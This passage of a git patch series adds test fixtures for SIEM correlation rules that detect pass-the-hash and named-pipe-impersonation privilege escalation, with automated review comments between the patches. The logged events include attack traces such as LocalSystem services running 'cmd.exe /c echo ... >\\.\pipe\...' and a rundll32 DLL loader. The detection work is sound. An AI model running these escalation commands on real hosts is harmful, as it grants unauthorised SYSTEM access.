From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Wed, 2 Aug 2023 10:24:39 +0300 Subject: [PATCH 48/57] =?UTF-8?q?=D0=A0=D0=B0=D1=81=D1=88=D0=B8=D1=80?= =?UTF-8?q?=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD?= =?UTF-8?q?=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5?= =?UTF-8?q?=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20?= =?UTF-8?q?=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0?= =?UTF-8?q?=20(Detect=5FPass=5Fthe=5FHash=5Fvia=5FMimikatz=5Flocal)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Detect_Pass_the_Hash_via_Mimikatz_local/tests/test_1.sc | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Detect_Pass_the_Hash_via_Mimikatz_local/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Detect_Pass_the_Hash_via_Mimikatz_local/tests/test_1.sc index c7d2d553..c75eecdf 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Detect_Pass_the_Hash_via_Mimikatz_local/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Detect_Pass_the_Hash_via_Mimikatz_local/tests/test_1.sc 
@@ -2,4 +2,5 @@ {"action": "elevate", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4672\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12548\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-18T11:06:29.9115792Z\"},\"EventRecordID\":\"432904\",\"Correlation\":{\"ActivityID\":\"{661f2d37-d535-43f5-bae0-06be7e6614d7}\"},\"Execution\":{\"ProcessID\":\"524\",\"ThreadID\":\"2884\"},\"Channel\":\"Security\",\"Computer\":\"PC01.example.corp\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1587066498-1489273250-1035260531-1106\"},{\"Name\":\"SubjectUserName\",\"text\":\"user01\"},{\"Name\":\"SubjectDomainName\",\"text\":\"EXAMPLE\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x4530f0f\"},{\"Name\":\"PrivilegeList\",\"text\":\"SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeImpersonatePrivilege\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "dst.fqdn": "pc01.example.corp", "dst.host": "pc01.example.corp", "dst.hostname": "pc01", "event_src.category": "AAA", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4672_Special_privileges_assigned_to_new_logon", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4672", "normalized": true, "object": "account", "object.account.domain": "example", "object.account.id": 
"S-1-5-21-1587066498-1489273250-1035260531-1106", "object.account.name": "user01", "object.account.privileges": "SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeImpersonatePrivilege", "object.account.session_id": "72552207", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T15:35:33.889Z", "src.fqdn": "pc01.example.corp", "src.host": "pc01.example.corp", "src.hostname": "pc01", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "subject.account.session_id": "72552207", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-18T11:06:29.911Z", "type": "raw", "uuid": "f9da3da2-ede6-44b8-9983-503a25f2b719"} # Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"correlation_name": "Detect_Pass_the_Hash_via_Mimikatz_local"} +expect 1 {"action": "elevate", "alert.key": "pc01.example.corp|user01|user01", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Access Token Manipulation: Make and Impersonate Token", "correlation_name": "Detect_Pass_the_Hash_via_Mimikatz_local", "correlation_type": "incident", "dst.fqdn": "pc01.example.corp", "dst.host": "pc01.example.corp", "dst.hostname": "pc01", "event_src.category": "AAA", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Detect_Pass_the_Hash_via_Mimikatz_local|pc01.example.corp|user01|user01", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "logon_service": "seclogo", 
"logon_type": 9, "object": "account", "object.account.domain": "example", "object.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "object.account.name": "user01", "object.account.privileges": "SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeImpersonatePrivilege", "object.account.session_id": "72552207", "src.fqdn": "pc01.example.corp", "src.host": "pc01.example.corp", "src.hostname": "pc01", "src.ip": "::1", "src.port": 0, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "subject.account.session_id": "72552207", "subject.process.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.id": "1004", "subject.process.name": "svchost.exe", "subject.process.path": "c:\\windows\\system32\\"} + \ No newline at end of file From b4f69509a09b4c062183e9e66e3de4a570b65222 Mon Sep 17 00:00:00 2001 
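Review bot: The hunk's last added line is a bare line followed by `\ No newline at end of file`, so the file now ends with an empty unterminated line after the expect block; drop that line (or terminate the expect line with a newline) so the next edit does not show a spurious whitespace change. The new expect also pins values that can only come from the file's first event — `src.ip` `::1`, `src.port` 0, `logon_type` 9, `logon_service` `seclogo`, `subject.process.fullpath` svchost.exe — and that event is on line 1, outside this hunk, so the match cannot be verified here. Pinning the full normalized record is a reasonable snapshot, but it will presumably break on any normalizer or taxonomy change rather than only on a rule regression; that trade-off deserves a comment line such as `# expect pins the full normalized incident; refresh it when taxonomy_version changes`.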
From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Wed, 2 Aug 2023 10:30:05 +0300 Subject: [PATCH 49/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(=20Named?= =?UTF-8?q?=5FPipe=5FImpersonation=5FPrivEsc)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Named_Pipe_Impersonation_PrivEsc/tests/test_1.sc | 6 ++++++ .../Named_Pipe_Impersonation_PrivEsc/tests/test_2.sc | 6 ++++++ .../Named_Pipe_Impersonation_PrivEsc/tests/test_3.sc | 6 ++++++ 3 files changed, 18 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_2.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_3.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_1.sc new file mode 100644 index 00000000..df51014c --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_1.sc 
@@ -0,0 +1,6 @@ +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"17\",\"Version\":\"1\",\"Level\":\"4\",\"Task\":\"17\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T10:24:33.2700764Z\"},\"EventRecordID\":\"90359678\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"9264\",\"ThreadID\":\"4564\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"EventType\",\"text\":\"CreatePipe\"},{\"Name\":\"UtcTime\",\"text\":\"2023-05-17 10:24:33.267\"},{\"Name\":\"ProcessGuid\",\"text\":\"{b56fc2d9-ab37-6464-5711-000000005e00}\"},{\"Name\":\"ProcessId\",\"text\":\"5852\"},{\"Name\":\"PipeName\",\"text\":\"\\\\fkkgxm\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\yfomina\\\\Downloads\\\\installer.exe\"},{\"Name\":\"User\",\"text\":\"TESTLAB\\\\yfomina\"}]}}}", "event_src.category": "Other", "event_src.fqdn": "win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_17_Pipe_created", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "17", "normalized": true, "object": "resource", "object.name": "fkkgxm", "object.type": "pipe", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T11:30:38.123Z", "status": "success", "subject": "process", "subject.account.domain": "testlab", "subject.account.id": 
"synthetic:yfomina@testlab", "subject.account.name": "yfomina", "subject.process.fullpath": "c:\\users\\yfomina\\downloads\\installer.exe", "subject.process.guid": "b56fc2d9-ab37-6464-5711-000000005e00", "subject.process.id": "5852", "subject.process.name": "installer.exe", "subject.process.path": "c:\\users\\yfomina\\downloads\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T10:24:33.267Z", "type": "raw", "uuid": "4a75c38e-8783-4ca0-95b7-6b9ed3a0788e"} +{"action": "bind", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"18\",\"Version\":\"1\",\"Level\":\"4\",\"Task\":\"18\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T10:24:33.2963447Z\"},\"EventRecordID\":\"90359686\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"9264\",\"ThreadID\":\"4564\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"EventType\",\"text\":\"ConnectPipe\"},{\"Name\":\"UtcTime\",\"text\":\"2023-05-17 10:24:33.283\"},{\"Name\":\"ProcessGuid\",\"text\":\"{b56fc2d9-ab61-6464-5811-000000005e00}\"},{\"Name\":\"ProcessId\",\"text\":\"10720\"},{\"Name\":\"PipeName\",\"text\":\"\\\\fkkgxm\"},{\"Name\":\"Image\",\"text\":\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"}]}}}", "event_src.category": "Other", "event_src.fqdn": "win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", 
"generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_18_Pipe_connected", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "18", "normalized": true, "object": "resource", "object.name": "fkkgxm", "object.type": "pipe", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T11:30:38.123Z", "status": "success", "subject": "process", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.process.fullpath": "c:\\windows\\system32\\cmd.exe", "subject.process.guid": "b56fc2d9-ab61-6464-5811-000000005e00", "subject.process.id": "10720", "subject.process.name": "cmd.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T10:24:33.283Z", "type": "raw", "uuid": "b05c5d49-e31c-4f96-bf5e-c3212935df6b"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Service Control Manager\",\"Guid\":\"{555908d1-a6d7-4695-8e1e-26931d2012f4}\",\"EventSourceName\":\"Service Control Manager\"},\"EventID\":{\"Qualifiers\":\"16384\",\"text\":\"7045\"},\"Version\":\"0\",\"Level\":\"4\",\"Task\":\"0\",\"Opcode\":\"0\",\"Keywords\":\"0x8080000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T10:24:33.2678382Z\"},\"EventRecordID\":\"117960\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"660\",\"ThreadID\":\"6052\"},\"Channel\":\"System\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-21-1129291328-2819992169-918366777-1113\"}},\"EventData\":{\"Data\":[{\"Name\":\"ServiceName\",\"text\":\"fkkgxm\"},{\"Name\":\"ImagePath\",\"text\":\"cmd.exe /c echo fkkgxm 
>\\\\\\\\.\\\\pipe\\\\fkkgxm\"},{\"Name\":\"ServiceType\",\"text\":\"user mode service\"},{\"Name\":\"StartType\",\"text\":\"demand start\"},{\"Name\":\"AccountName\",\"text\":\"LocalSystem\"}]}}}", "category.generic": "Service", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.subsys": "System", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_7045_New_Windows_Service", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7045", "normalized": true, "object": "service", "object.account.name": "localsystem", "object.name": "fkkgxm", "object.process.cmdline": "cmd.exe /c echo fkkgxm >\\\\.\\pipe\\fkkgxm", "object.property": "start type", "object.type": "user mode service", "object.value": "demand start", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T11:30:38.123Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T10:24:33.267Z", "type": "raw", "uuid": "2c08367a-9497-4256-b3eb-95edf32d130a"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "escalate", "alert.context": "yfomina -> system", "alert.key": "c:\\users\\yfomina\\downloads\\installer.exe", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Token Impersonation/Theft", "correlation_name": "Named_Pipe_Impersonation_PrivEsc", "correlation_type": "incident", "event_src.category": "Other", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "object": "session", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.name": "fkkgxm", "object.property": "start type", "object.type": "user mode service", "object.value": "demand start", "reason": "Named Pipe Impersonation (In Memory/Admin)", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:yfomina@testlab", "subject.account.name": "yfomina", "subject.process.fullpath": "c:\\users\\yfomina\\downloads\\installer.exe", "subject.process.guid": "b56fc2d9-ab37-6464-5711-000000005e00", "subject.process.id": "5852", "subject.process.name": "installer.exe", "subject.process.path": "c:\\users\\yfomina\\downloads\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_2.sc new file mode 100644 index 00000000..4510ffa4 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_2.sc 
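Review bot: The three events are fed in the order Sysmon 17 (10:24:33.267), Sysmon 18 (10:24:33.283), then 7045, although the 7045 service installation is timestamped 10:24:33.267 and therefore precedes the pipe connection on the real host. If the correlator consumes the fixture in file order and the rule's join is order-sensitive, the test passes on an ordering that does not occur live and says nothing about the 17 -> 7045 -> 18 path; reorder the lines to timestamp order or state that order is irrelevant. Either way the placeholder `# Тут будет твой тест ...` line should carry the description, e.g. `# pipe create (17) by installer.exe as yfomina, service install (7045) and pipe connect (18) as SYSTEM, joined on the name fkkgxm; one incident expected`.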
@@ -0,0 +1,6 @@
+{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"17\",\"Version\":\"1\",\"Level\":\"4\",\"Task\":\"17\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T12:07:45.7662329Z\"},\"EventRecordID\":\"90395131\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4200\",\"ThreadID\":\"13908\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"EventType\",\"text\":\"CreatePipe\"},{\"Name\":\"UtcTime\",\"text\":\"2023-05-17 12:07:45.760\"},{\"Name\":\"ProcessGuid\",\"text\":\"{b56fc2d9-ab37-6464-5711-000000005e00}\"},{\"Name\":\"ProcessId\",\"text\":\"5852\"},{\"Name\":\"PipeName\",\"text\":\"\\\\pdxxuf\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\yfomina\\\\Downloads\\\\installer.exe\"},{\"Name\":\"User\",\"text\":\"TESTLAB\\\\yfomina\"}]}}}", "event_src.category": "Other", "event_src.fqdn": "win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_17_Pipe_created", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "17", "normalized": true, "object": "resource", "object.name": "pdxxuf", "object.type": "pipe", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T11:57:31.328Z", "status": "success", "subject": "process", "subject.account.domain": "testlab", "subject.account.id": "synthetic:yfomina@testlab", "subject.account.name": "yfomina", "subject.process.fullpath": "c:\\users\\yfomina\\downloads\\installer.exe", "subject.process.guid": "b56fc2d9-ab37-6464-5711-000000005e00", "subject.process.id": "5852", "subject.process.name": "installer.exe", "subject.process.path": "c:\\users\\yfomina\\downloads\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T12:07:45.760Z", "type": "raw", "uuid": "1355e6e8-8fba-4e4c-afc0-1a0828b0ae2b"}
+{"action": "bind", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"18\",\"Version\":\"1\",\"Level\":\"4\",\"Task\":\"18\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T12:07:45.9872895Z\"},\"EventRecordID\":\"90395139\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4200\",\"ThreadID\":\"13908\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"EventType\",\"text\":\"ConnectPipe\"},{\"Name\":\"UtcTime\",\"text\":\"2023-05-17 12:07:45.979\"},{\"Name\":\"ProcessGuid\",\"text\":\"{b56fc2d9-c391-6464-1412-000000005e00}\"},{\"Name\":\"ProcessId\",\"text\":\"13856\"},{\"Name\":\"PipeName\",\"text\":\"\\\\pdxxuf\"},{\"Name\":\"Image\",\"text\":\"C:\\\\WINDOWS\\\\system32\\\\rundll32.exe\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"}]}}}", "event_src.category": "Other", "event_src.fqdn": "win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_18_Pipe_connected", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "18", "normalized": true, "object": "resource", "object.name": "pdxxuf", "object.type": "pipe", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T11:57:31.328Z", "status": "success", "subject": "process", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.process.fullpath": "c:\\windows\\system32\\rundll32.exe", "subject.process.guid": "b56fc2d9-c391-6464-1412-000000005e00", "subject.process.id": "13856", "subject.process.name": "rundll32.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T12:07:45.979Z", "type": "raw", "uuid": "18419f52-6dfe-4de4-a9df-60220d170138"}
+{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Service Control Manager\",\"Guid\":\"{555908d1-a6d7-4695-8e1e-26931d2012f4}\",\"EventSourceName\":\"Service Control Manager\"},\"EventID\":{\"Qualifiers\":\"16384\",\"text\":\"7045\"},\"Version\":\"0\",\"Level\":\"4\",\"Task\":\"0\",\"Opcode\":\"0\",\"Keywords\":\"0x8080000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T12:07:45.7609721Z\"},\"EventRecordID\":\"117972\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"660\",\"ThreadID\":\"12720\"},\"Channel\":\"System\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-21-1129291328-2819992169-918366777-1113\"}},\"EventData\":{\"Data\":[{\"Name\":\"ServiceName\",\"text\":\"pdxxuf\"},{\"Name\":\"ImagePath\",\"text\":\"rundll32.exe C:\\\\Users\\\\yfomina\\\\AppData\\\\Local\\\\Temp\\\\pdxxuf.dll,a /p:pdxxuf\"},{\"Name\":\"ServiceType\",\"text\":\"user mode service\"},{\"Name\":\"StartType\",\"text\":\"demand start\"},{\"Name\":\"AccountName\",\"text\":\"LocalSystem\"}]}}}", "category.generic": "Service", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.subsys": "System", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_7045_New_Windows_Service", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7045", "normalized": true, "object": "service", "object.account.name": "localsystem", "object.name": "pdxxuf", "object.process.cmdline": "rundll32.exe C:\\Users\\yfomina\\AppData\\Local\\Temp\\pdxxuf.dll,a /p:pdxxuf", "object.property": "start type", "object.type": "user mode service", "object.value": "demand start", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T11:57:31.328Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T12:07:45.760Z", "type": "raw", "uuid": "5a23eb15-74f6-48d3-8ae5-70a7ae447c99"}
+
+# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "escalate", "alert.context": "yfomina -> system", "alert.key": "c:\\users\\yfomina\\downloads\\installer.exe", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Token Impersonation/Theft", "correlation_name": "Named_Pipe_Impersonation_PrivEsc", "correlation_type": "incident", "event_src.category": "Other", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "object": "session", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.name": "pdxxuf", "object.property": "start type", "object.type": "user mode service", "object.value": "demand start", "reason": "Named Pipe Impersonation (Dropper/Admin)", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:yfomina@testlab", "subject.account.name": "yfomina", "subject.process.fullpath": "c:\\users\\yfomina\\downloads\\installer.exe", "subject.process.guid": "b56fc2d9-ab37-6464-5711-000000005e00", "subject.process.id": "5852", "subject.process.name": "installer.exe", "subject.process.path": "c:\\users\\yfomina\\downloads\\"}
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_3.sc
new file mode 100644
index 00000000..8386245f
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_3.sc
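Review bot: The scaffold comment `# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь` is committed as-is and says nothing about the fixture, so a reader has to reconstruct from the three raw events why exactly one `escalate` event is expected; the same placeholder is left in test_3.sc and in the Potential_Privileged_Escalation_via_KrbRelayUp test_1.sc further down. Replace it with a one-line scenario description, e.g. `# Dropper/Admin variant: installer.exe (yfomina) creates pipe \pdxxuf, rundll32.exe running as SYSTEM connects to it, and service pdxxuf (rundll32 loading pdxxuf.dll from the user's Temp) is registered -> expect one escalate event`. Note also that the expected event carries `object.property`/`object.type`/`object.value` ("start type"/"user mode service"/"demand start") taken from the 7045 event while `object` is "session"; if that carry-over is not intended by the 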